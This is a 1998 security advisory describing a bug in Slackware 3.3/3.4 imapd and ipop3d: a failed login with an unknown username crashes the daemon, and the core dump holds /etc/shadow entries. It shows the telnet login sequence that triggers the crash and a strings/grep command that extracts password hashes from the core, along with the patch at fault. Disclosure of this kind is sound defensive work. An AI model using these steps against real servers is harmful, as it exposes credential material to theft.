COMMAND

    imapd/ipop3d

SYSTEMS AFFECTED

    Slackware 3.3 (only imapd) and 3.4

PROBLEM

    Peter van Dijk found following bug in imapd/ipop3d that comes with
    slackware  3.4  (if  you  install  the  pine  package).    Earlier
    slackware  versions  will  problably  NOT  suffer  from  this bug.
    When fed an unknown username, imapd and ipop3d will dump core:

        [root@koek] /# telnet host 110
        Trying 10.10.13.1...
        Connected to host.com
        Escape character is '^]'.
        +OK some host POP3 3.3(20) w/IMAP2 client (Comments to MRC@CAC.Washington.EDU) at Sun, 1 Feb 1998 23:45:06 +0100 (CET)
        user root
        +OK User name accepted, password please
        pass linux
        [this is not the correct password]
        -ERR Bad login
        user john
        [no user named john]
        +OK User name accepted, password please
        pass doe
        Connection closed by foreign host.

    At this point ipop3d coredumps in /core:

        [root@zopie] /# strings core | grep -A3 root
        root
        [crypted pw here]

        10244
        Sun Feb  1 23:45:15 1998
        --
        root:[crypted pw here]:10244:0:::::
        halt:*:9797:0:::::
        operator:*:9797:0:::::
        shutdown:*:9797:0:::::
        [looks like /etc/shadow]
        --
        root:[crypted pw here]:10244:0:::::
        john
        host.com
        PASS

    Same goes for imapd:

        Connected to host.com
        * OK zopie.attic.vuurwerk.nl IMAP2bis Service 7.8(100) at Sun, 1 Feb 1998 23:53:00 +0100 (CET)
        A001 LOGIN root linux
        A001 NO Bad LOGIN user name and/or password
        A002 LOGIN john doe
        Connection closed by foreign host.

    Doing the strings/grep again gives about the same result.  Running
    this under  strace shows  that the  program reads  /etc/passwd and
    closes  it  again,  then  reopens  it  (to  try  the  username  in
    lowercase) and reads again, followed by a SIGSEGV.  The bug is  in
    (one  of)  the  patches  and  diffs  that  are  applied to support
    shadowing in Linux.  The problem is in log_lnx.c.diff.gz:

        -  if (!(pw && pw->pw_uid)) return NIL;
        +/*  if (!(pw && pw->pw_uid)) return NIL; */

    Note that  the dumped  core is  mode 600,  _unless_ /core  already
    exists, in which case it's permissions are retained.   Apparently,
    the stock ipop3d is not vunerable, but imapd is.

SOLUTION

    According to  Patrick Volkerding  [maintainer of  Slackware] he'll
    take the patch out and put a repaired package on the ftp site.